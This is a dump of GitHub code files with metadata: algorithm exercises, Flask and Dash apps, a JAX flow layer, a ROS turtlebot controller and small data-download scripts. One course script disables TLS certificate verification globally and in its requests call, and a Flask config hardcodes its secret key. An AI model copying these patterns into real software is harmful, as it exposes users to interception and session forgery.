"line_number": 8, "usage_type": "call"}]} +{"seq_id": "3576151762", "text": "from typing import List\n\n\ndef solution(A: List, K: int):\n\n items_length = len(A)\n\n # placeholder new items\n new_items = [0] * items_length\n for i in range(items_length):\n r = rotate(K, i, items_length)\n new_items[r] = A[i]\n\n return new_items\n\n\ndef rotate(times, index, length):\n \"\"\"rotate index number of times\"\"\"\n\n return (index + times) % length\n\n\ndef solution2(A: List, K: int):\n \"\"\"\n rotate A, K times\n\n if value of K is within the length of the Array (K <= length(A)) then, \n the item at the Kth will be the first item at the end of the rotation.\n\n The issue with this approach is that of when K > length(A) then we could\n use K mod length(A) to find the new K\n \"\"\"\n\n # find the start index \n start_index = K - 1\n\n head = A[start_index:]\n tail = A[:start_index]\n\n return head + tail\n\n\nif __name__ == \"__main__\":\n # print(solution([3, 8, 9, 7, 6], 3))\n print(solution2([3, 8, 9, 7, 6], 3))\n\n# print(solution([0, 0, 0], 1))\n# print(solution([1, 2, 3, 4], 4))\n", "repo_name": "phacic/dsa-py", "sub_path": "codility/lessons/2-arrays/cyclic_rotate.py", "file_name": "cyclic_rotate.py", "file_ext": "py", "file_size_in_byte": 1047, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "14439205661", "text": "import os\nfrom requests import get\nimport json\nimport csv\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\nclass Task(object):\n def __init__(self):\n print('Downloading JSON file and printing entire file:') \n self.response = get('http://db.cs.pitt.edu/courses/cs1656/data/hours.json', verify=False) \n print(self.response.content) \n\n print('Loading as JSON and iterating one line at a time:') \n self.hours = json.loads(self.response.content) \n print(self.hours) \n\n print('\\nIterating over JSON:') \n for line in self.hours: \n print(line) \n\n def part4(self):\n #write output to hours.csv\n with open('hours.json', 'r+') as j_file:\n j_data = json.load(j_file)\n\n csv_file = open('hours.csv', 'w')\n writer = csv.writer(csv_file)\n\n key_printed = False\n\n for keys in j_data:\n if key_printed is False:\n writer.writerow(keys)\n key_printed = True \n writer.writerow(keys.values())\n \n csv_file.close()\n pass\n \n\n def part5(self):\n\n c_file = open('hours.csv', 'r')\n reader = csv.reader(c_file)\n print(reader)\n \n #write output to 'part5.txt'\n f = open('part5.txt', 'w') \n f.writelines(str(reader))\n c_file.close()\n f.close()\n\n def part6(self):\n #write output to 'part6.txt'\n f = open('part6.txt', 'w') \n\n c_file = open('hours.csv', 'r')\n reader = csv.reader(c_file)\n for row in reader:\n print(row)\n f.writelines(str(row)+\"\\n\")\n\n c_file.close()\n f.close()\n \n\n def part7(self):\n #write output to 'part7.txt'\n f = open('part7.txt', 'w') \n \n c_file = open('hours.csv', 'r')\n reader = csv.reader(c_file)\n for row in reader:\n for cell in row:\n print(cell)\n f.writelines(str(cell)+\"\\n\")\n\n c_file.close()\n f.close()\n\n\nif __name__ == '__main__':\n task = Task()\n task.part4()\n task.part5()\n task.part6()\n task.part7()", "repo_name": "ap1605/CS1656_rec1", "sub_path": "rec_1/task.py", "file_name": "task.py", "file_ext": "py", "file_size_in_byte": 2192, "program_lang": "python", "lang": "en", 
"doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ssl._create_default_https_context", "line_number": 6, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 6, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 28, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 45, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 59, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "40162064528", "text": "from flask import Blueprint, render_template, current_app\nfrom addiction.models.file import File\nimport os\nfrom addiction.views.publications.forms import UploadForm\nfrom werkzeug.utils import secure_filename\n\n\npublication_blueprint=Blueprint('publication', __name__, template_folder=\"templates\")\nname_dict={\"academic\":\"აკადემიური პუბლიკაციები\", \"annual\":\"წლიური ანგარიშები\", \"books\": \"წიგნები\", \"prevention\":\"პრევენციის სახელმძღვანელოები\", \"psychoed\":\"ფსიქოგანათლება\", \"research\":\"კვლევითი ანგარიშები\", \"treatment\":\"მკურნალობის გზამკვლევები\"}\n\n\n@publication_blueprint.route(\"/publications/\", methods=['GET', 'POST'])\ndef publication(folder):\n publications=File.query.filter_by(folder=folder).all()\n form=UploadForm()\n if form.validate_on_submit():\n if form.pdf.data:\n filename=secure_filename(form.pdf.data.filename)\n displayname=form.displayname.data\n path=os.path.join(current_app.config['BASE_DIR'], 'static', 'publications', folder, filename)\n form.pdf.data.save(path)\n new_file=File(filename=filename, displayname=displayname, file_path=path, folder=folder)\n new_file.create()\n return render_template(\"publications/publications.html\", publications=publications, name_dict=name_dict, folder=folder, form=form)\n\n\n\n\n@publication_blueprint.route('/view/')\ndef view(pdf_name):\n publication=File.query.filter_by(filename=pdf_name).first()\n return render_template(\"publications/closeview.html\", publication=publication, name_dict=name_dict)\n\n", "repo_name": "lasha-chipashvili/AddictionStudies", "sub_path": "addiction/views/publications/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 1812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query.filter_by", "line_number": 14, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query", "line_number": 14, "usage_type": "attribute"}, {"api_name": "addiction.models.file.File", "line_number": 14, "usage_type": "name"}, {"api_name": "addiction.views.publications.forms.UploadForm", "line_number": 15, "usage_type": "call"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.current_app.config", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 20, "usage_type": "name"}, {"api_name": "addiction.models.file.File", "line_number": 22, "usage_type": "call"}, {"api_name": 
"flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query.filter_by", "line_number": 31, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query", "line_number": 31, "usage_type": "attribute"}, {"api_name": "addiction.models.file.File", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "19314201286", "text": "import haiku as hk\nfrom chex import Array\nfrom jax import numpy as jnp\n\nfrom surjectors.surjectors.funnel import Funnel\n\n\nclass Augment(Funnel):\n \"\"\"\n Augment funnel\n \"\"\"\n\n def __init__(self, n_keep, encoder):\n super().__init__(n_keep, None, None, encoder, \"generative_surjector\")\n\n def split_input(self, array):\n \"\"\"Split an array\"\"\"\n spl = jnp.split(array, [self.n_keep], axis=-1)\n return spl\n\n def inverse_and_likelihood_contribution(self, y, x: Array = None, **kwargs):\n z_plus = y_condition = y\n if x is not None:\n y_condition = jnp.concatenate([y_condition, x], axis=-1)\n z_minus, lc = self.encoder(y_condition).sample_and_log_prob(\n seed=hk.next_rng_key()\n )\n z = jnp.concatenate([z_plus, z_minus], axis=-1)\n return z, -lc\n\n def forward_and_likelihood_contribution(self, z, x=None, **kwargs):\n z_plus, z_minus = self.split_input(z)\n y_condition = y = z_plus\n if x is not None:\n y_condition = jnp.concatenate([y_condition, x], axis=-1)\n lc = self.encoder(y_condition).log_prob(z_minus)\n return y, -lc\n\n def forward(self, z, x=None):\n y, _ = self.forward_and_likelihood_contribution(z, x)\n return y\n", "repo_name": "dirmeier/ssnl", "sub_path": "surjectors/surjectors/surjectors/augment.py", "file_name": "augment.py", "file_ext": "py", "file_size_in_byte": 1280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "surjectors.surjectors.funnel.Funnel", "line_number": 8, "usage_type": "name"}, {"api_name": "jax.numpy.split", "line_number": 18, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 18, "usage_type": "name"}, {"api_name": "chex.Array", "line_number": 21, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 24, "usage_type": "name"}, {"api_name": "haiku.next_rng_key", "line_number": 26, "usage_type": "call"}, {"api_name": "jax.numpy.concatenate", "line_number": 28, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 28, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 35, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "17445323702", "text": "import altair as alt \nimport pandas as pd\nimport numpy as np\nfrom dash import Dash, html, dcc, Input, Output\n\n\nmovies = pd.read_json(\"./data/movies.json\")\n\napp = Dash(__name__, external_stylesheets=['https://codepen.io/chriddyp/pen/bWLwgP.css'])\nserver = app.server\napp.layout = html.Div([\n \"Movies Vote Average by Different Variables\",\n html.Iframe(\n id='scatter',\n style={'border-width': '0', 'width': '100%', 'height': '400px'}),\n dcc.Dropdown(\n id='xcol-widget',\n value='runtime', # REQUIRED to show the plot on the first page load\n options=[{'label': col, 'value': col} for col in movies.select_dtypes(include=np.number).columns]),\n dcc.Dropdown(\n id='colour-widget',\n value='studios', # REQUIRED to show the plot on the first page load\n 
options=[{'label': \"Studios\", 'value': \"studios\"}, {'label': \"Genres\", 'value': \"genres\"}])])\n\n# Set up callbacks/backend\n@app.callback(\n Output('scatter', 'srcDoc'),\n Input('xcol-widget', 'value'),\n Input('colour-widget', 'value'))\ndef plot_altair(xcol, colour):\n chart = alt.Chart(movies).mark_point().encode(\n x=xcol,\n y='vote_average',\n color=colour,\n tooltip='vote_average').interactive()\n return chart.to_html()\n\nif __name__ == '__main__': \n app.run_server(debug=False)", "repo_name": "AraiYuno/python-dash-demo", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_json", "line_number": 7, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 9, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 11, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 11, "usage_type": "name"}, {"api_name": "dash.html.Iframe", "line_number": 13, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 13, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 16, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.number", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dash.dcc.Dropdown", "line_number": 20, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 20, "usage_type": "name"}, {"api_name": "altair.Chart", "line_number": 31, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 27, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 28, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "71045616806", "text": "# You are given an integer array nums consisting of n elements, and an integer \n# k. \n# \n# Find a contiguous subarray whose length is greater than or equal to k that \n# has the maximum average value and return this value. Any answer with a \n# calculation error less than 10⁻⁵ will be accepted. 
\n# \n# \n# Example 1: \n# \n# \n# Input: nums = [1,12,-5,-6,50,3], k = 4\n# Output: 12.75000\n# Explanation:\n# - When the length is 4, averages are [0.5, 12.75, 10.5] and the maximum \n# average is 12.75\n# - When the length is 5, averages are [10.4, 10.8] and the maximum average is 1\n# 0.8\n# - When the length is 6, averages are [9.16667] and the maximum average is 9.16\n# 667\n# The maximum average is when we choose a subarray of length 4 (i.e., the sub \n# array [12, -5, -6, 50]) which has the max average 12.75, so we return 12.75\n# Note that we do not consider the subarrays of length < 4.\n# \n# \n# Example 2: \n# \n# \n# Input: nums = [5], k = 1\n# Output: 5.00000\n# \n# \n# \n# Constraints: \n# \n# \n# n == nums.length \n# 1 <= k <= n <= 10⁴ \n# -10⁴ <= nums[i] <= 10⁴ \n# \n# Related Topics Array Binary Search 👍 542 👎 61\nfrom itertools import accumulate\nfrom typing import List, Optional\nfrom dataStructure.ListNode import ListNode\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n    def findMaxAverage(self, nums: List[int], k: int) -> float:\n        n=len(nums)\n        def check(mid):\n            pre=[0]+list(accumulate([v-mid for v in nums]))\n            minv=0\n            for i in range(k,n+1):\n                # here we cannot simply check pre[i]-pre[i-k]>=0\n                # [-1,2,-3,-2,3]\n                if pre[i]-minv>=0:return True\n                # must keep the distance at least k\n                minv=min(minv,pre[i-k+1])\n            return False\n\n        l,r=min(nums),max(nums)\n        # binary search\n        while r-l>1e-5:\n            mid=(l+r)/2\n            if check(mid):\n                l=mid\n            else:\n                r=mid\n        return r\n    \n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n    a = Solution()", "repo_name": "ChaunceyBai98/LeetCodePython", "sub_path": "leetcode/editor/en/[644]Maximum Average Subarray II.py", "file_name": "[644]Maximum Average Subarray II.py", "file_ext": "py", "file_size_in_byte": 2122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "itertools.accumulate", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "35173472973", "text": "import twstock\nimport matplotlib.pyplot as plt\nimport pandas as pd\nst = twstock.Stock('2454')\n# fetch stock data from January 2018 up to today\nst1= st.fetch_from(2018,1) \nst2454 = pd.DataFrame(st1)\nst2454 = st2454.set_index('date')\nfig = plt.figure(figsize=(10, 6))\nplt.plot(st2454.close, '-' , label=\"close\")\nplt.plot(st2454.open, '-' , label=\"open\")\nplt.title('MediaTech 2018 open/close',loc='right')\n# loc -> position of the title\nplt.xlabel('date')\nplt.ylabel('close')\nplt.grid(True, axis='y')\nplt.legend()\nfig.savefig('day20_01.png')\n", "repo_name": "HwangProbot/stockResearch", "sub_path": "getDataPlotOpenClose.py", "file_name": "getDataPlotOpenClose.py", "file_ext": "py", "file_size_in_byte": 533, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "twstock.Stock", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.title", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "9197382975", "text": "import os\nfrom pathlib import Path\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Config:\n SECRET_KEY = 'super duper secret key'\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'database.db')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n\n FLATS = [\"Memmert\", \"Borkum\", \"Kajo\"]\n DOC_PATH = Path(basedir) / \"documents\"\n BOOKING_STATES = [\"angefragt\", \"reserviert\"]\n PAYMENT_STATES = [\"offen\", \"Anzahlung\", \"bezahlt\"]\n TOURIST_TAX_STATES = [\"offen\", \"bezahlt\"]", "repo_name": "johannes-scheibe/rental-manager", "sub_path": "rental_manager/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "9466587415", "text": "#!/usr/bin/env python\n#The line above tells Linux that this file is a Python script,\n#and that the OS should use the Python interpreter in /usr/bin/env\n#to run it. Don't forget to use \"chmod +x [filename]\" to make\n#this script executable.\n\n#Import the rospy package. 
For an import to work, it must be specified\n#in both the package manifest AND the Python file in which it is used.\nimport rospy\nimport tf\nimport sys\nimport numpy as np\nfrom geometry_msgs.msg import Twist, PoseArray, Pose, Quaternion, Point, Vector3\nfrom rrt.msg import PointArray\nfrom tf.transformations import quaternion_matrix, euler_from_quaternion\n\n#Define the method which contains the main functionality of the node.\ndef controller(message):\n \"\"\"\n Controls a robot whose position is denoted by robot_frame,\n to go to a position denoted by target_frame\n Inputs:\n - robot_frame: the tf frame of the robot base.\n - target_frame: the tf frame of the desired position.\n \"\"\"\n\n ################################### YOUR CODE HERE #############\n #Create a publisher and a tf buffer, which is primed with a tf listener\n #TODO: replace 'INPUT TOPIC' with the correct name for the ROS topic on which\n # the robot accepts velocity inputs.\n pub = rospy.Publisher('teleop_velocity_smoother/raw_cmd_vel', Twist, queue_size=10)\n #tfBuffer = tf.Buffer()\n tfListener = tf.TransformListener()\n\n \n # Create a timer object that will sleep long enough to result in\n # a 10Hz publishing rate\n freq = 2\n r = rospy.Rate(freq) # freq hz\n freq2 = 10\n r2 = rospy.Rate(freq2)\n\n K1 = 1\n K2 = 1\n\n pos_epsilon_error = 0.5 #set error value\n orientation_epsilon_error = 0.01\n x_diff_error = 0.05\n y_diff_error = 0.05\n\n zero_cmd = Twist()\n zero_cmd.linear = Vector3()\n zero_cmd.angular = Vector3()\n zero_cmd.linear.x = 0\n zero_cmd.linear.y = 0\n zero_cmd.linear.z = 0\n zero_cmd.angular.x = 0\n zero_cmd.angular.y = 0\n zero_cmd.angular.z = 0\n\n robot_frame = '/base_link' #TODO this needs to be a TF frame. I can't figure out how to create a TF frame and attach it to the gazebo turtlebot\n fixed_frame = '/map' #TODO this is currently the marker.header.frame_id from assignment.py. 
\n\n # poses = [Pose(Point(-3, 1.5, 0), Quaternion(x=0, y=0, z=1, w=np.pi))] #message.poses\n target_points = message.points # [Point(-3, 1.5, 0)]\n for i in range(len(target_points)):\n target_point = target_points[i]\n reachedOrientation = False\n reachedPosition = False\n\n # Loop until the node is killed with Ctrl-C \n blah = 0\n while not reachedPosition:\n while not reachedOrientation:\n print(\"Orientation iteration \", blah)\n blah += 1\n \n tfListener.waitForTransform(fixed_frame, robot_frame, rospy.Time(), rospy.Duration(4.0))\n trans, rot = tfListener.lookupTransform(fixed_frame, robot_frame, rospy.Time()) \n \n #current_pose = Pose()\n current_point = Point()\n current_point.x = trans[0]\n current_point.y = trans[1]\n current_point.z = trans[2]\n print(rot)\n print(type(rot))\n #current_pose.position = current_point\n #current_quaternion = Quaternion()\n current_quaternion = rot\n #current_quaternion.x, current_quaternion.y, current_quaternion.z, current_quaternion.w = rot[0], rot[1], rot[2], rot[3]\n current_euler = euler_from_quaternion(rot)\n\n # given a point to move to, first orient in the direction of travel (no linear velocity)\n x_diff = target_point.x - current_point.x\n y_diff = target_point.y - current_point.y\n\n euclidean_dist = np.sqrt(x_diff**2 + y_diff**2)\n\n goal_angle = np.arctan(y_diff / x_diff)\n change_in_angle = -current_euler[2] + goal_angle\n\n print(\"Goal angle is \", goal_angle)\n print(\"Change in angle is \", change_in_angle)\n print(\"x_diff is \", x_diff)\n print(\"y_diff is \", y_diff)\n print(\"Current quaternion is \", current_quaternion)\n print(\"Current euler is \", current_euler)\n\n if euclidean_dist < pos_epsilon_error or (np.abs(x_diff) < x_diff_error and np.abs(y_diff) < y_diff_error):\n reachedPosition = True\n pub.publish(zero_cmd)\n print(\"REACHED POSITION\")\n r2.sleep()\n break\n\n if np.abs(change_in_angle) < orientation_epsilon_error:\n reachedOrientation = True\n print(\"REACHED ANGLE\")\n pub.publish(zero_cmd)\n r.sleep()\n break\n\n cmd = Twist()\n cmd.linear = Vector3()\n cmd.angular = Vector3()\n\n cmd.linear.x = 0.0\n cmd.linear.y = 0.0\n cmd.linear.z = 0.0\n cmd.angular.x = 0.0\n cmd.angular.y = 0.0\n cmd.angular.z = change_in_angle # * freq * 2 #np.arctan(y/x) #y # theta_dot\n\n pub.publish(cmd)\n r.sleep()\n #pub.publish(cmd)\n #r.sleep()\n #pub.publish(cmd)\n #r.sleep()\n\n # now, move straight with 0 orientation (no angular velocity)\n\n if reachedPosition:\n break\n kj = 0\n reachedOrientation = False\n while kj < 10:\n\n print(\"Iteration \", kj)\n kj += 1\n\n tfListener.waitForTransform(robot_frame, fixed_frame, rospy.Time(), rospy.Duration(4.0))\n trans, rot = tfListener.lookupTransform(robot_frame, fixed_frame, rospy.Time()) \n \n #current_pose = Pose()\n current_point = Point()\n current_point.x = trans[0]\n current_point.y = trans[1]\n current_point.z = trans[2]\n\n # given a point to move to, first orient in the direction of travel (no linear velocity)\n x_diff = target_point.x - current_point.x\n y_diff = target_point.y - current_point.y\n\n euclidean_dist = np.sqrt(x_diff**2 + y_diff**2)\n\n if euclidean_dist < pos_epsilon_error or (np.abs(x_diff) < x_diff_error and np.abs(y_diff) < y_diff_error):\n reachedPosition = True\n pub.publish(zero_cmd)\n print(\"REACHED POSITION\")\n r2.sleep()\n break\n\n cmd2 = Twist()\n cmd2.linear = Vector3()\n cmd2.angular = Vector3()\n\n cmd2.linear.x = euclidean_dist\n cmd2.linear.y = 0.0\n cmd2.linear.z = 0.0\n cmd2.angular.x = 0.0\n cmd2.angular.y = 0.0\n cmd2.angular.z = 
0.0\n\n pub.publish(cmd2)\n r2.sleep()\n\n\n\n # try:\n # # Process trans to get your state error\n # # Generate a control command to send to the robot\n # x = target_pose.position.x - current_pose.position.x\n # y = target_pose.position.y - current_pose.position.y\n\n\n # x_dot = np.sqrt((x)**2 + (y)**2)\n\n # if x_dot < epsilon_error:\n # reached = True\n # break\n\n # theta_dot = target_pose.orientation.w - w[3]\n\n # # x_dot = K1 * trans.transform.translation.x\n # # theta_dot = K2 * trans.transform.translation.y\n # print(\"X dot \", x_dot)\n # print(\"Theta dot \", theta_dot)\n\n # cmd = Twist()\n\n # cmd.linear.x = K1 * x_dot\n # cmd.linear.y = 0.0\n # cmd.linear.z = 0.0\n # cmd.angular.x = 0.0\n # cmd.angular.y = 0.0\n # cmd.angular.z = 1 #np.arctan(y/x) #y # theta_dot\n\n # control_command = cmd\n\n # #################################### end your code ###############\n\n # pub.publish(control_command)\n\n # except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n # reached = True #move on to next target? \n\n # # Use our rate object to sleep until it is time to publish again\n # r.sleep()\n\n\ndef pose_to_trans(p):\n q = p.pose.orientation\n pos = p.pose.position\n T = quaternion_matrix([q.x,q.y,q.z,q.w])\n T[:3,3] = np.array([pos.x,pos.y,pos.z])\n return T\n\n \n\n#Define the method which contains the node's main functionality\ndef listener():\n\n #Create a new instance of the rospy.Subscriber object which we can \n #use to receive messages of type std_msgs/String from the topic /chatter_talk.\n #Whenever a new message is received, the method callback() will be called\n #with the received message as its first argument.\n rospy.Subscriber(\"path_points\", PointArray, controller)\n\n\n\n #Wait for messages to arrive on the subscribed topics, and exit the node\n #when it is killed with Ctrl+C\n rospy.spin()\n\n \n# This is Python's sytax for a main() method, which is run by default\n# when exectued in the shell\nif __name__ == '__main__':\n # Check if the node has received a signal to shut down\n # If not, run the talker method\n #Run this program as a new node in the ROS computation graph \n #called /turtlebot_controller.\n rospy.init_node('turtlebot_controller', anonymous=True)\n #controller()\n\n listener()", "repo_name": "srishti-99/final_project", "sub_path": "workspace/src/rrt/src/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 8705, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rospy.Publisher", "line_number": 31, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 31, "usage_type": "argument"}, {"api_name": "tf.TransformListener", "line_number": 33, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 39, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 41, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 51, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 52, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 53, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 78, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 78, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 79, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Point", "line_number": 82, "usage_type": "call"}, {"api_name": "tf.transformations.euler_from_quaternion", 
"line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 117, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 124, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 125, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 126, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 153, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 153, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 154, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Point", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 168, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 175, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 176, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 177, "usage_type": "call"}, {"api_name": "tf.transformations.quaternion_matrix", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 237, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 249, "usage_type": "call"}, {"api_name": "rrt.msg.PointArray", "line_number": 249, "usage_type": "argument"}, {"api_name": "rospy.spin", "line_number": 255, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 265, "usage_type": "call"}]} +{"seq_id": "42468540470", "text": "from PIL import Image\nimport os\nimport urllib.request\n\nSUN_IMAGE_URL_NASA = \"https://sdo.gsfc.nasa.gov/assets/img/latest/latest_4096_211193171.jpg\"\nIMAGE_WORKING_DIRECTORY = \"bgs\"\nSOURCE_IMAGE_FILENAME = \"source.jpg\"\n\n\ndef download_image():\n global SUN_IMAGE_URL_NASA, IMAGE_WORKING_DIRECTORY, \\\n SOURCE_IMAGE_FILENAME\n # Make the working directory for images\n # if it doesn't exist.\n if not os.path.exists(IMAGE_WORKING_DIRECTORY):\n os.makedirs(IMAGE_WORKING_DIRECTORY)\n # Download the image\n urllib.request.urlretrieve(\n SUN_IMAGE_URL_NASA, \"{}/{}\".format(IMAGE_WORKING_DIRECTORY, SOURCE_IMAGE_FILENAME))\n\n\ndef create_backgrounds():\n global IMAGE_WORKING_DIRECTORY, SOURCE_IMAGE_FILENAME\n # The source image is 4096x4096\n # Split it with PIL to make the 1920x1080 pieces for both monitors\n with Image.open(\"{}/{}\".format(IMAGE_WORKING_DIRECTORY, SOURCE_IMAGE_FILENAME)) as image:\n # Crop the portion that makes up the left monitor\n monitor_left = (128, 1508, 2048, 2588)\n monitor_region_left = image.crop(monitor_left)\n # Crop the portion that makes up the right monitor\n monitor_right = (2048, 1508, 3968, 2588)\n monitor_region_right = image.crop(monitor_right)\n # Write the images to disk\n monitor_region_left.save(\n \"{}/monitor_left.jpg\".format(IMAGE_WORKING_DIRECTORY))\n monitor_region_right.save(\n \"{}/monitor_right.jpg\".format(IMAGE_WORKING_DIRECTORY))\n\n\ndef main():\n # Download the image from NASA\n download_image()\n # Create the Desktop wallpaper images\n create_backgrounds()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ValliereMagic/SunBGPy", "sub_path": "src/sun_bg.py", "file_name": "sun_bg.py", "file_ext": "py", "file_size_in_byte": 1674, "program_lang": "python", "lang": "en", "doc_type": 
